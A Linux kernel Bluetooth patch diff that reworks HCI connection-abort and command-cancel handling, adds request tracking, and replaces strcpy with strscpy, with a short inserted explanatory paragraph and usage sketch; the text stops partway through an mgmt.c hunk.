+index 12d36875358b9..bac5a369d2bef 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -175,57 +175,6 @@ static void hci_conn_cleanup(struct hci_conn *conn)
+ 	hci_dev_put(hdev);
+ }
+ 
+-static void le_scan_cleanup(struct work_struct *work)
+-{
+-	struct hci_conn *conn = container_of(work, struct hci_conn,
+-					     le_scan_cleanup);
+-	struct hci_dev *hdev = conn->hdev;
+-	struct hci_conn *c = NULL;
+-
+-	BT_DBG("%s hcon %p", hdev->name, conn);
+-
+-	hci_dev_lock(hdev);
+-
+-	/* Check that the hci_conn is still around */
+-	rcu_read_lock();
+-	list_for_each_entry_rcu(c, &hdev->conn_hash.list, list) {
+-		if (c == conn)
+-			break;
+-	}
+-	rcu_read_unlock();
+-
+-	if (c == conn) {
+-		hci_connect_le_scan_cleanup(conn, 0x00);
+-		hci_conn_cleanup(conn);
+-	}
+-
+-	hci_dev_unlock(hdev);
+-	hci_dev_put(hdev);
+-	hci_conn_put(conn);
+-}
+-
+-static void hci_connect_le_scan_remove(struct hci_conn *conn)
+-{
+-	BT_DBG("%s hcon %p", conn->hdev->name, conn);
+-
+-	/* We can't call hci_conn_del/hci_conn_cleanup here since that
+-	 * could deadlock with another hci_conn_del() call that's holding
+-	 * hci_dev_lock and doing cancel_delayed_work_sync(&conn->disc_work).
+-	 * Instead, grab temporary extra references to the hci_dev and
+-	 * hci_conn and perform the necessary cleanup in a separate work
+-	 * callback.
+-	 */
+-
+-	hci_dev_hold(conn->hdev);
+-	hci_conn_get(conn);
+-
+-	/* Even though we hold a reference to the hdev, many other
+-	 * things might get cleaned up meanwhile, including the hdev's
+-	 * own workqueue, so we can't use that for scheduling.
+-	 */
+-	schedule_work(&conn->le_scan_cleanup);
+-}
+-
+ static void hci_acl_create_connection(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+@@ -672,13 +621,6 @@ static void hci_conn_timeout(struct work_struct *work)
+ 	if (refcnt > 0)
+ 		return;
+ 
+-	/* LE connections in scanning state need special handling */
+-	if (conn->state == BT_CONNECT && conn->type == LE_LINK &&
+-	    test_bit(HCI_CONN_SCANNING, &conn->flags)) {
+-		hci_connect_le_scan_remove(conn);
+-		return;
+-	}
+-
+ 	hci_abort_conn(conn, hci_proto_disconn_ind(conn));
+ }
+ 
+@@ -1050,7 +992,6 @@ struct hci_conn *hci_conn_add(struct hci_dev *hdev, int type, bdaddr_t *dst,
+ 	INIT_DELAYED_WORK(&conn->auto_accept_work, hci_conn_auto_accept);
+ 	INIT_DELAYED_WORK(&conn->idle_work, hci_conn_idle);
+ 	INIT_DELAYED_WORK(&conn->le_conn_timeout, le_conn_timeout);
+-	INIT_WORK(&conn->le_scan_cleanup, le_scan_cleanup);
+ 
+ 	atomic_set(&conn->refcnt, 0);
+ 
+@@ -2837,81 +2778,46 @@ u32 hci_conn_get_phy(struct hci_conn *conn)
+ 	return phys;
+ }
+ 
+-int hci_abort_conn(struct hci_conn *conn, u8 reason)
++static int abort_conn_sync(struct hci_dev *hdev, void *data)
+ {
+-	int r = 0;
++	struct hci_conn *conn;
++	u16 handle = PTR_ERR(data);
+ 
+-	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++	conn = hci_conn_hash_lookup_handle(hdev, handle);
++	if (!conn)
+ 		return 0;
+ 
+-	switch (conn->state) {
+-	case BT_CONNECTED:
+-	case BT_CONFIG:
+-		if (conn->type == AMP_LINK) {
+-			struct hci_cp_disconn_phy_link cp;
++	return hci_abort_conn_sync(hdev, conn, conn->abort_reason);
++}
+ 
+-			cp.phy_handle = HCI_PHY_HANDLE(conn->handle);
+-			cp.reason = reason;
+-			r = hci_send_cmd(conn->hdev, HCI_OP_DISCONN_PHY_LINK,
+-					 sizeof(cp), &cp);
+-		} else {
+-			struct hci_cp_disconnect dc;
++int hci_abort_conn(struct hci_conn *conn, u8 reason)
++{
++	struct hci_dev *hdev = conn->hdev;
+ 
+-			dc.handle = cpu_to_le16(conn->handle);
+-			dc.reason = reason;
+-			r = hci_send_cmd(conn->hdev, HCI_OP_DISCONNECT,
+-					 sizeof(dc), &dc);
+-		}
++	/* If abort_reason has already been set it means the connection is
++	 * already being aborted so don't attempt to overwrite it.
++	 */
++	if (conn->abort_reason)
++		return 0;
+ 
+-		conn->state = BT_DISCONN;
++	bt_dev_dbg(hdev, "handle 0x%2.2x reason 0x%2.2x", conn->handle, reason);
+ 
+-		break;
+-	case BT_CONNECT:
+-		if (conn->type == LE_LINK) {
+-			if (test_bit(HCI_CONN_SCANNING, &conn->flags))
+-				break;
+-			r = hci_send_cmd(conn->hdev,
+-					 HCI_OP_LE_CREATE_CONN_CANCEL, 0, NULL);
+-		} else if (conn->type == ACL_LINK) {
+-			if (conn->hdev->hci_ver < BLUETOOTH_VER_1_2)
+-				break;
+-			r = hci_send_cmd(conn->hdev,
+-					 HCI_OP_CREATE_CONN_CANCEL,
+-					 6, &conn->dst);
+-		}
+-		break;
+-	case BT_CONNECT2:
+-		if (conn->type == ACL_LINK) {
+-			struct hci_cp_reject_conn_req rej;
+-
+-			bacpy(&rej.bdaddr, &conn->dst);
+-			rej.reason = reason;
+-
+-			r = hci_send_cmd(conn->hdev,
+-					 HCI_OP_REJECT_CONN_REQ,
+-					 sizeof(rej), &rej);
+-		} else if (conn->type == SCO_LINK || conn->type == ESCO_LINK) {
+-			struct hci_cp_reject_sync_conn_req rej;
+-
+-			bacpy(&rej.bdaddr, &conn->dst);
+-
+-			/* SCO rejection has its own limited set of
+-			 * allowed error values (0x0D-0x0F) which isn't
+-			 * compatible with most values passed to this
+-			 * function. To be safe hard-code one of the
+-			 * values that's suitable for SCO.
+-			 */
+-			rej.reason = HCI_ERROR_REJ_LIMITED_RESOURCES;
++	conn->abort_reason = reason;
+ 
+-			r = hci_send_cmd(conn->hdev,
+-					 HCI_OP_REJECT_SYNC_CONN_REQ,
+-					 sizeof(rej), &rej);
++	/* If the connection is pending, check the command opcode since it
++	 * might be blocking on hci_cmd_sync_work while waiting for its
++	 * respective event, so we need hci_cmd_sync_cancel() to cancel it.
++	 */
++	if (conn->state == BT_CONNECT && hdev->req_status == HCI_REQ_PEND) {
++		switch (hci_skb_event(hdev->sent_cmd)) {
++		case HCI_EV_LE_CONN_COMPLETE:
++		case HCI_EV_LE_ENHANCED_CONN_COMPLETE:
++		case HCI_EVT_LE_CIS_ESTABLISHED:
++			hci_cmd_sync_cancel(hdev, ECANCELED);
++			break;
+ 		}
+-		break;
+-	default:
+-		conn->state = BT_CLOSED;
+-		break;
+ 	}
+ 
+-	return r;
++	return hci_cmd_sync_queue(hdev, abort_conn_sync, ERR_PTR(conn->handle),
++				  NULL);
+ }
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index a8932d449eb63..70f24dc75b596 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -908,7 +908,7 @@ int hci_get_dev_info(void __user *arg)
+ 	else
+ 		flags = hdev->flags;
+ 
+-	strcpy(di.name, hdev->name);
++	strscpy(di.name, hdev->name, sizeof(di.name));
+ 	di.bdaddr   = hdev->bdaddr;
+ 	di.type     = (hdev->bus & 0x0f) | ((hdev->dev_type & 0x03) << 4);
+ 	di.flags    = flags;
+@@ -1491,11 +1491,12 @@ static void hci_cmd_timeout(struct work_struct *work)
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev,
+ 					    cmd_timer.work);
+ 
+-	if (hdev->sent_cmd) {
+-		struct hci_command_hdr *sent = (void *) hdev->sent_cmd->data;
+-		u16 opcode = __le16_to_cpu(sent->opcode);
++	if (hdev->req_skb) {
++		u16 opcode = hci_skb_opcode(hdev->req_skb);
+ 
+ 		bt_dev_err(hdev, "command 0x%4.4x tx timeout", opcode);
++
++		hci_cmd_sync_cancel_sync(hdev, ETIMEDOUT);
+ 	} else {
+ 		bt_dev_err(hdev, "command tx timeout");
+ 	}
+@@ -2791,6 +2792,7 @@ void hci_release_dev(struct hci_dev *hdev)
+ 
+ 	ida_simple_remove(&hci_index_ida, hdev->id);
+ 	kfree_skb(hdev->sent_cmd);
++	kfree_skb(hdev->req_skb);
+ 	kfree_skb(hdev->recv_event);
+ 	kfree(hdev);
+ }
+@@ -2822,6 +2824,23 @@ int hci_unregister_suspend_notifier(struct hci_dev *hdev)
+ 	return ret;
+ }
+ 
++/* Cancel ongoing command synchronously:
++ *
++ * - Cancel command timer
++ * - Reset command counter
++ * - Cancel command request
++ */
++static void hci_cancel_cmd_sync(struct hci_dev *hdev, int err)
++{
++	bt_dev_dbg(hdev, "err 0x%2.2x", err);
++
++	cancel_delayed_work_sync(&hdev->cmd_timer);
++	cancel_delayed_work_sync(&hdev->ncmd_timer);
++	atomic_set(&hdev->cmd_cnt, 1);
++
++	hci_cmd_sync_cancel_sync(hdev, -err);
++}
++
+ /* Suspend HCI device */
+ int hci_suspend_dev(struct hci_dev *hdev)
+ {
+@@ -2838,6 +2857,9 @@ int hci_suspend_dev(struct hci_dev *hdev)
+ 	if (mgmt_powering_down(hdev))
+ 		return 0;
+ 
++	/* Cancel potentially blocking sync operation before suspend */
++	hci_cancel_cmd_sync(hdev, -EHOSTDOWN);
++
+ 	hci_req_sync_lock(hdev);
+ 	ret = hci_suspend_sync(hdev);
+ 	hci_req_sync_unlock(hdev);
+@@ -3100,21 +3122,33 @@ int __hci_cmd_send(struct hci_dev *hdev, u16 opcode, u32 plen,
+ EXPORT_SYMBOL(__hci_cmd_send);
+ 
+ /* Get data from the previously sent command */
+-void *hci_sent_cmd_data(struct hci_dev *hdev, __u16 opcode)
++static void *hci_cmd_data(struct sk_buff *skb, __u16 opcode)
+ {
+ 	struct hci_command_hdr *hdr;
+ 
+-	if (!hdev->sent_cmd)
++	if (!skb || skb->len < HCI_COMMAND_HDR_SIZE)
+ 		return NULL;
+ 
+-	hdr = (void *) hdev->sent_cmd->data;
++	hdr = (void *)skb->data;
+ 
+ 	if (hdr->opcode != cpu_to_le16(opcode))
+ 		return NULL;
+ 
+-	BT_DBG("%s opcode 0x%4.4x", hdev->name, opcode);
++	return skb->data + HCI_COMMAND_HDR_SIZE;
++}
++
++/* Get data from the previously sent command */
++void *hci_sent_cmd_data(struct hci_dev *hdev, __u16 opcode)
++{
++	void *data;
++
++	/* Check if opcode matches last sent command */
++	data = hci_cmd_data(hdev->sent_cmd, opcode);
++	if (!data)
++		/* Check if opcode matches last request */
++		data = hci_cmd_data(hdev->req_skb, opcode);
+ 
+-	return hdev->sent_cmd->data + HCI_COMMAND_HDR_SIZE;
++	return data;
+ }
+ 
+ /* Get data from last received event */
+@@ -4010,17 +4044,19 @@ void hci_req_cmd_complete(struct hci_dev *hdev, u16 opcode, u8 status,
+ 	if (!status && !hci_req_is_complete(hdev))
+ 		return;
+ 
++	skb = hdev->req_skb;
++
+ 	/* If this was the last command in a request the complete
+-	 * callback would be found in hdev->sent_cmd instead of the
++	 * callback would be found in hdev->req_skb instead of the
+ 	 * command queue (hdev->cmd_q).
+ 	 */
+-	if (bt_cb(hdev->sent_cmd)->hci.req_flags & HCI_REQ_SKB) {
+-		*req_complete_skb = bt_cb(hdev->sent_cmd)->hci.req_complete_skb;
++	if (skb && bt_cb(skb)->hci.req_flags & HCI_REQ_SKB) {
++		*req_complete_skb = bt_cb(skb)->hci.req_complete_skb;
+ 		return;
+ 	}
+ 
+-	if (bt_cb(hdev->sent_cmd)->hci.req_complete) {
+-		*req_complete = bt_cb(hdev->sent_cmd)->hci.req_complete;
++	if (skb && bt_cb(skb)->hci.req_complete) {
++		*req_complete = bt_cb(skb)->hci.req_complete;
+ 		return;
+ 	}
+ 
+@@ -4116,6 +4152,36 @@ static void hci_rx_work(struct work_struct *work)
+ 	}
+ }
+ 
++static void hci_send_cmd_sync(struct hci_dev *hdev, struct sk_buff *skb)
++{
++	int err;
++
++	bt_dev_dbg(hdev, "skb %p", skb);
++
++	kfree_skb(hdev->sent_cmd);
++
++	hdev->sent_cmd = skb_clone(skb, GFP_KERNEL);
++	if (!hdev->sent_cmd) {
++		skb_queue_head(&hdev->cmd_q, skb);
++		queue_work(hdev->workqueue, &hdev->cmd_work);
++		return;
++	}
++
++	err = hci_send_frame(hdev, skb);
++	if (err < 0) {
++		hci_cmd_sync_cancel_sync(hdev, err);
++		return;
++	}
++
++	if (hci_req_status_pend(hdev) &&
++	    !hci_dev_test_and_set_flag(hdev, HCI_CMD_PENDING)) {
++		kfree_skb(hdev->req_skb);
++		hdev->req_skb = skb_clone(hdev->sent_cmd, GFP_KERNEL);
++	}
++
++	atomic_dec(&hdev->cmd_cnt);
++}
++
+ static void hci_cmd_work(struct work_struct *work)
+ {
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev, cmd_work);
+@@ -4130,30 +4196,15 @@ static void hci_cmd_work(struct work_struct *work)
+ 		if (!skb)
+ 			return;
+ 
+-		kfree_skb(hdev->sent_cmd);
+-
+-		hdev->sent_cmd = skb_clone(skb, GFP_KERNEL);
+-		if (hdev->sent_cmd) {
+-			int res;
+-			if (hci_req_status_pend(hdev))
+-				hci_dev_set_flag(hdev, HCI_CMD_PENDING);
+-			atomic_dec(&hdev->cmd_cnt);
+-
+-			res = hci_send_frame(hdev, skb);
+-			if (res < 0)
+-				__hci_cmd_sync_cancel(hdev, -res);
+-
+-			rcu_read_lock();
+-			if (test_bit(HCI_RESET, &hdev->flags) ||
+-			    hci_dev_test_flag(hdev, HCI_CMD_DRAIN_WORKQUEUE))
+-				cancel_delayed_work(&hdev->cmd_timer);
+-			else
+-				queue_delayed_work(hdev->workqueue, &hdev->cmd_timer,
+-						   HCI_CMD_TIMEOUT);
+-			rcu_read_unlock();
+-		} else {
+-			skb_queue_head(&hdev->cmd_q, skb);
+-			queue_work(hdev->workqueue, &hdev->cmd_work);
+-		}
++		hci_send_cmd_sync(hdev, skb);
++
++		rcu_read_lock();
++		if (test_bit(HCI_RESET, &hdev->flags) ||
++		    hci_dev_test_flag(hdev, HCI_CMD_DRAIN_WORKQUEUE))
++			cancel_delayed_work(&hdev->cmd_timer);
++		else
++			queue_delayed_work(hdev->workqueue, &hdev->cmd_timer,
++					   HCI_CMD_TIMEOUT);
++		rcu_read_unlock();
+ 	}
+ }
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 452d839c152fc..b150dee88f35c 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -1761,7 +1761,7 @@ static void store_pending_adv_report(struct hci_dev *hdev, bdaddr_t *bdaddr,
+ {
+ 	struct discovery_state *d = &hdev->discovery;
+ 
+-	if (len > HCI_MAX_AD_LENGTH)
++	if (len > max_adv_len(hdev))
+ 		return;
+ 
+ 	bacpy(&d->last_adv_addr, bdaddr);
+@@ -3567,8 +3567,6 @@ static void hci_remote_name_evt(struct hci_dev *hdev, void *data,
+ 
+ 	bt_dev_dbg(hdev, "status 0x%2.2x", ev->status);
+ 
+-	hci_conn_check_pending(hdev);
+-
+ 	hci_dev_lock(hdev);
+ 
+ 	conn = hci_conn_hash_lookup_ba(hdev, ACL_LINK, &ev->bdaddr);
+@@ -4331,7 +4329,7 @@ static void hci_cmd_status_evt(struct hci_dev *hdev, void *data,
+ 	 * (since for this kind of commands there will not be a command
+ 	 * complete event).
+ 	 */
+-	if (ev->status || (hdev->sent_cmd && !hci_skb_event(hdev->sent_cmd))) {
++	if (ev->status || (hdev->req_skb && !hci_skb_event(hdev->req_skb))) {
+ 		hci_req_cmd_complete(hdev, *opcode, ev->status, req_complete,
+ 				     req_complete_skb);
+ 		if (hci_dev_test_flag(hdev, HCI_CMD_PENDING)) {
+@@ -6242,8 +6240,9 @@ static void process_adv_report(struct hci_dev *hdev, u8 type, bdaddr_t *bdaddr,
+ 		return;
+ 	}
+ 
+-	if (!ext_adv && len > HCI_MAX_AD_LENGTH) {
+-		bt_dev_err_ratelimited(hdev, "legacy adv larger than 31 bytes");
++	if (len > max_adv_len(hdev)) {
++		bt_dev_err_ratelimited(hdev,
++				       "adv larger than maximum supported");
+ 		return;
+ 	}
+ 
+@@ -6308,7 +6307,8 @@ static void process_adv_report(struct hci_dev *hdev, u8 type, bdaddr_t *bdaddr,
+ 	 */
+ 	conn = check_pending_le_conn(hdev, bdaddr, bdaddr_type, bdaddr_resolved,
+ 				     type);
+-	if (!ext_adv && conn && type == LE_ADV_IND && len <= HCI_MAX_AD_LENGTH) {
++	if (!ext_adv && conn && type == LE_ADV_IND &&
++	    len <= max_adv_len(hdev)) {
+ 		/* Store report for later inclusion by
+ 		 * mgmt_device_connected
+ 		 */
+@@ -6449,7 +6449,7 @@ static void hci_le_adv_report_evt(struct hci_dev *hdev, void *data,
+ 					info->length + 1))
+ 			break;
+ 
+-		if (info->length <= HCI_MAX_AD_LENGTH) {
++		if (info->length <= max_adv_len(hdev)) {
+ 			rssi = info->data[info->length];
+ 			process_adv_report(hdev, info->type, &info->bdaddr,
+ 					   info->bdaddr_type, NULL, 0, rssi,
+@@ -7149,10 +7149,10 @@ static void hci_le_meta_evt(struct hci_dev *hdev, void *data,
+ 	bt_dev_dbg(hdev, "subevent 0x%2.2x", ev->subevent);
+ 
+ 	/* Only match event if command OGF is for LE */
+-	if (hdev->sent_cmd &&
+-	    hci_opcode_ogf(hci_skb_opcode(hdev->sent_cmd)) == 0x08 &&
+-	    hci_skb_event(hdev->sent_cmd) == ev->subevent) {
+-		*opcode = hci_skb_opcode(hdev->sent_cmd);
++	if (hdev->req_skb &&
++	    hci_opcode_ogf(hci_skb_opcode(hdev->req_skb)) == 0x08 &&
++	    hci_skb_event(hdev->req_skb) == ev->subevent) {
++		*opcode = hci_skb_opcode(hdev->req_skb);
+ 		hci_req_cmd_complete(hdev, *opcode, 0x00, req_complete,
+ 				     req_complete_skb);
+ 	}
+@@ -7539,10 +7539,10 @@ void hci_event_packet(struct hci_dev *hdev, struct sk_buff *skb)
+ 	}
+ 
+ 	/* Only match event if command OGF is not for LE */
+-	if (hdev->sent_cmd &&
+-	    hci_opcode_ogf(hci_skb_opcode(hdev->sent_cmd)) != 0x08 &&
+-	    hci_skb_event(hdev->sent_cmd) == event) {
+-		hci_req_cmd_complete(hdev, hci_skb_opcode(hdev->sent_cmd),
++	if (hdev->req_skb &&
++	    hci_opcode_ogf(hci_skb_opcode(hdev->req_skb)) != 0x08 &&
++	    hci_skb_event(hdev->req_skb) == event) {
++		hci_req_cmd_complete(hdev, hci_skb_opcode(hdev->req_skb),
+ 				     status, &req_complete, &req_complete_skb);
+ 		req_evt = event;
+ 	}
+diff --git a/net/bluetooth/hci_request.c b/net/bluetooth/hci_request.c
+index f7e006a363829..4468647df6722 100644
+--- a/net/bluetooth/hci_request.c
++++ b/net/bluetooth/hci_request.c
+@@ -916,7 +916,7 @@ void hci_request_setup(struct hci_dev *hdev)
+ 
+ void hci_request_cancel_all(struct hci_dev *hdev)
+ {
+-	__hci_cmd_sync_cancel(hdev, ENODEV);
++	hci_cmd_sync_cancel_sync(hdev, ENODEV);
+ 
+ 	cancel_interleave_scan(hdev);
+ }
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index a337340464567..65b2ad34179f8 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -31,6 +31,10 @@ static void hci_cmd_sync_complete(struct hci_dev *hdev, u8 result, u16 opcode,
+ 	hdev->req_result = result;
+ 	hdev->req_status = HCI_REQ_DONE;
+ 
++	/* Free the request command so it is not used as response */
++	kfree_skb(hdev->req_skb);
++	hdev->req_skb = NULL;
++
+ 	if (skb) {
+ 		struct sock *sk = hci_skb_sk(skb);
+ 
+@@ -38,7 +42,7 @@ static void hci_cmd_sync_complete(struct hci_dev *hdev, u8 result, u16 opcode,
+ 		if (sk)
+ 			sock_put(sk);
+ 
+-		hdev->req_skb = skb_get(skb);
++		hdev->req_rsp = skb_get(skb);
+ 	}
+ 
+ 	wake_up_interruptible(&hdev->req_wait_q);
+@@ -186,8 +190,8 @@ struct sk_buff *__hci_cmd_sync_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 
+ 	hdev->req_status = 0;
+ 	hdev->req_result = 0;
+-	skb = hdev->req_skb;
+-	hdev->req_skb = NULL;
++	skb = hdev->req_rsp;
++	hdev->req_rsp = NULL;
+ 
+ 	bt_dev_dbg(hdev, "end: err %d", err);
+ 
+@@ -651,7 +655,7 @@ void hci_cmd_sync_clear(struct hci_dev *hdev)
+ 	mutex_unlock(&hdev->cmd_sync_work_lock);
+ }
+ 
+-void __hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
++void hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
+ {
+ 	bt_dev_dbg(hdev, "err 0x%2.2x", err);
+ 
+@@ -659,15 +663,17 @@ void __hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
+ 		hdev->req_result = err;
+ 		hdev->req_status = HCI_REQ_CANCELED;
+ 
+-		cancel_delayed_work_sync(&hdev->cmd_timer);
+-		cancel_delayed_work_sync(&hdev->ncmd_timer);
+-		atomic_set(&hdev->cmd_cnt, 1);
+-
+-		wake_up_interruptible(&hdev->req_wait_q);
++		queue_work(hdev->workqueue, &hdev->cmd_sync_cancel_work);
+ 	}
+ }
++EXPORT_SYMBOL(hci_cmd_sync_cancel);
+ 
+-void hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
++/* Cancel ongoing command request synchronously:
++ *
++ * - Set result and mark status to HCI_REQ_CANCELED
++ * - Wake up the command sync thread
++ */
++void hci_cmd_sync_cancel_sync(struct hci_dev *hdev, int err)
+ {
+ 	bt_dev_dbg(hdev, "err 0x%2.2x", err);
+ 
+@@ -675,13 +681,17 @@ void hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
+ 		hdev->req_result = err;
+ 		hdev->req_status = HCI_REQ_CANCELED;
+ 
+-		queue_work(hdev->workqueue, &hdev->cmd_sync_cancel_work);
++		wake_up_interruptible(&hdev->req_wait_q);
+ 	}
+ }
+-EXPORT_SYMBOL(hci_cmd_sync_cancel);
++EXPORT_SYMBOL(hci_cmd_sync_cancel_sync);
+ 
+-int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
+-		       void *data, hci_cmd_sync_work_destroy_t destroy)
++/* Submit HCI command to be run as cmd_sync_work:
++ *
++ * - hdev must _not_ be unregistered
++ */
++int hci_cmd_sync_submit(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
++			void *data, hci_cmd_sync_work_destroy_t destroy)
+ {
+ 	struct hci_cmd_sync_work_entry *entry;
+ 	int err = 0;
+@@ -711,6 +721,23 @@ int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
+ 	mutex_unlock(&hdev->unregister_lock);
+ 	return err;
+ }
++EXPORT_SYMBOL(hci_cmd_sync_submit);
++
++/* Queue HCI command:
++ *
++ * - hdev must be running
++ */
++int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
++		       void *data, hci_cmd_sync_work_destroy_t destroy)
++{
++	/* Only queue the command if hdev is running, which means it has been
++	 * opened and is either in the init phase or already up.
++	 */
++	if (!test_bit(HCI_RUNNING, &hdev->flags))
++		return -ENETDOWN;
++
++	return hci_cmd_sync_submit(hdev, func, data, destroy);
++}
+ EXPORT_SYMBOL(hci_cmd_sync_queue);
+ 
+ int hci_update_eir_sync(struct hci_dev *hdev)
+@@ -4856,6 +4883,11 @@ int hci_dev_open_sync(struct hci_dev *hdev)
+ 			hdev->sent_cmd = NULL;
+ 		}
+ 
++		if (hdev->req_skb) {
++			kfree_skb(hdev->req_skb);
++			hdev->req_skb = NULL;
++		}
++
+ 		clear_bit(HCI_RUNNING, &hdev->flags);
+ 		hci_sock_dev_event(hdev, HCI_DEV_CLOSE);
+ 
+@@ -5017,6 +5049,12 @@ int hci_dev_close_sync(struct hci_dev *hdev)
+ 		hdev->sent_cmd = NULL;
+ 	}
+ 
++	/* Drop last request */
++	if (hdev->req_skb) {
++		kfree_skb(hdev->req_skb);
++		hdev->req_skb = NULL;
++	}
++
+ 	clear_bit(HCI_RUNNING, &hdev->flags);
+ 	hci_sock_dev_event(hdev, HCI_DEV_CLOSE);
+ 
+@@ -5209,22 +5247,27 @@ static int hci_disconnect_sync(struct hci_dev *hdev, struct hci_conn *conn,
+ }
+ 
+ static int hci_le_connect_cancel_sync(struct hci_dev *hdev,
+-				      struct hci_conn *conn)
++				      struct hci_conn *conn, u8 reason)
+ {
++	/* Return the reason if scanning, since the connection will probably
++	 * be cleaned up directly.
++	 */
+ 	if (test_bit(HCI_CONN_SCANNING, &conn->flags))
+-		return 0;
++		return reason;
+ 
+-	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++	if (conn->role == HCI_ROLE_SLAVE ||
++	    test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
+ 		return 0;
+ 
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_LE_CREATE_CONN_CANCEL,
+ 				     0, NULL, HCI_CMD_TIMEOUT);
+ }
+ 
+-static int hci_connect_cancel_sync(struct hci_dev *hdev, struct hci_conn *conn)
++static int hci_connect_cancel_sync(struct hci_dev *hdev, struct hci_conn *conn,
++				   u8 reason)
+ {
+ 	if (conn->type == LE_LINK)
+-		return hci_le_connect_cancel_sync(hdev, conn);
++		return hci_le_connect_cancel_sync(hdev, conn, reason);
+ 
+ 	if (hdev->hci_ver < BLUETOOTH_VER_1_2)
+ 		return 0;
+@@ -5277,9 +5320,11 @@ int hci_abort_conn_sync(struct hci_dev *hdev, struct hci_conn *conn, u8 reason)
+ 	case BT_CONFIG:
+ 		return hci_disconnect_sync(hdev, conn, reason);
+ 	case BT_CONNECT:
+-		err = hci_connect_cancel_sync(hdev, conn);
++		err = hci_connect_cancel_sync(hdev, conn, reason);
+ 		/* Cleanup hci_conn object if it cannot be cancelled as it
+-		 * likelly means the controller and host stack are out of sync.
++	 * likely means the controller and host stack are out of sync,
++	 * or in the case of LE it was still scanning so it can be
++	 * cleaned up safely.
+ 		 */
+ 		if (err) {
+ 			hci_dev_lock(hdev);
+@@ -6194,7 +6239,7 @@ int hci_le_create_conn_sync(struct hci_dev *hdev, struct hci_conn *conn)
+ 
+ done:
+ 	if (err == -ETIMEDOUT)
+-		hci_le_connect_cancel_sync(hdev, conn);
++		hci_le_connect_cancel_sync(hdev, conn, 0x00);
+ 
+ 	/* Re-enable advertising after the connection attempt is finished. */
+ 	hci_resume_advertising_sync(hdev);
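
The hci_sync.c split above leaves two entry points: hci_cmd_sync_submit() only requires that hdev is not unregistered, while hci_cmd_sync_queue() additionally insists on HCI_RUNNING. A hedged usage sketch mirroring the mgmt.c set_powered hunk later in this patch (function names taken from there):

static int queue_power_change(struct hci_dev *hdev, bool power_on,
			      void *cmd)
{
	if (power_on)
		/* hdev may not be HCI_RUNNING yet, so only _submit()
		 * (which merely needs a registered hdev) can work here.
		 */
		return hci_cmd_sync_submit(hdev, set_powered_sync, cmd,
					   mgmt_set_powered_complete);

	/* Cancel a potentially blocking sync op, then use the stricter
	 * variant that refuses commands once hdev stops running.
	 */
	hci_cmd_sync_cancel_sync(hdev, -EHOSTDOWN);
	return hci_cmd_sync_queue(hdev, set_powered_sync, cmd,
				  mgmt_set_powered_complete);
}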
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 6d631a2e60166..716f6dc4934b7 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -1039,6 +1039,8 @@ static void rpa_expired(struct work_struct *work)
+ 	hci_cmd_sync_queue(hdev, rpa_expired_sync, NULL, NULL);
+ }
+ 
++static int set_discoverable_sync(struct hci_dev *hdev, void *data);
++
+ static void discov_off(struct work_struct *work)
+ {
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev,
+@@ -1057,7 +1059,7 @@ static void discov_off(struct work_struct *work)
+ 	hci_dev_clear_flag(hdev, HCI_DISCOVERABLE);
+ 	hdev->discov_timeout = 0;
+ 
+-	hci_update_discoverable(hdev);
++	hci_cmd_sync_queue(hdev, set_discoverable_sync, NULL, NULL);
+ 
+ 	mgmt_new_settings(hdev);
+ 
+@@ -1399,8 +1401,16 @@ static int set_powered(struct sock *sk, struct hci_dev *hdev, void *data,
+ 		goto failed;
+ 	}
+ 
+-	err = hci_cmd_sync_queue(hdev, set_powered_sync, cmd,
+-				 mgmt_set_powered_complete);
++	/* Cancel potentially blocking sync operation before power off */
++	if (cp->val == 0x00) {
++		hci_cmd_sync_cancel_sync(hdev, -EHOSTDOWN);
++		err = hci_cmd_sync_queue(hdev, set_powered_sync, cmd,
++					 mgmt_set_powered_complete);
++	} else {
++		/* Use hci_cmd_sync_submit since hdev might not be running */
++		err = hci_cmd_sync_submit(hdev, set_powered_sync, cmd,
++					  mgmt_set_powered_complete);
++	}
+ 
+ 	if (err < 0)
+ 		mgmt_pending_remove(cmd);
+@@ -3573,18 +3583,6 @@ static int pair_device(struct sock *sk, struct hci_dev *hdev, void *data,
+ 	return err;
+ }
+ 
+-static int abort_conn_sync(struct hci_dev *hdev, void *data)
+-{
+-	struct hci_conn *conn;
+-	u16 handle = PTR_ERR(data);
+-
+-	conn = hci_conn_hash_lookup_handle(hdev, handle);
+-	if (!conn)
+-		return 0;
+-
+-	return hci_abort_conn_sync(hdev, conn, HCI_ERROR_REMOTE_USER_TERM);
+-}
+-
+ static int cancel_pair_device(struct sock *sk, struct hci_dev *hdev, void *data,
+ 			      u16 len)
+ {
+@@ -3635,8 +3633,7 @@ static int cancel_pair_device(struct sock *sk, struct hci_dev *hdev, void *data,
+ 					      le_addr_type(addr->type));
